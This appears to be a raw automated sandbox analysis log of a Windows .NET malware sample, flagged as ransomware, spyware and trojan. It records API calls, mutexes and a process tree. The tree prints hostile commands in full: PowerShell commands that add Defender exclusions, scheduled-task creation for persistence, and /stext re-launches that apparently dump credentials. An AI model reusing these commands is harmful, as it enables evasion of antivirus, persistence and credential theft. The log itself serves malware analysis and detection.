                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: mXJeXQoaGktJCW.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: _0020.SetAccessControl
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.408d7f8.3.raw.unpack, QhBFofCVxaxcONJT4Z.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, QhBFofCVxaxcONJT4Z.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, QhBFofCVxaxcONJT4Z.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 10.2.mXJeXQoaGktJCW.exe.4f68810.1.raw.unpack, QhBFofCVxaxcONJT4Z.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.4147e18.0.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, QhBFofCVxaxcONJT4Z.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.b4b0000.5.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: _0020.AddAccessRule
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: _0020.SetAccessControl
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 10.2.mXJeXQoaGktJCW.exe.4eae1f0.0.raw.unpack, qVTa4C2qFjWp91p9EE.cs | Security API names: _0020.AddAccessRule
                    Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@31/19@3/2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 17_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 15_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | File created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7644:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Mutant created: NULL
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-7XAUXH
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Mutant created: \Sessions\1\BaseNamedObjects\hkdRDDrngmy
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | File created: C:\Users\user\AppData\Local\Temp\tmp8E60.tmp
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeSystem information queried: HandleInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000013.00000002.2133437049.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142979032.000000000308C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Process created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Process created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\ighpidhzropmtxboqpldcaaujighwuh"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp8E60.tmp"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\vkwehamdpyfugcryqteiojtur"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\xmcxhkxfdgxhrrnkzezbznfdacwy"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe /stext "C:\Users\user\AppData\Local\Temp\ighpidhzropmtxboqpldcaaujighwuh"
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mXJeXQoaGktJCW" /XML "C:\Users\user\AppData\Local\Temp\tmp9E3E.tmp"
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Process created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Process created: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe "C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
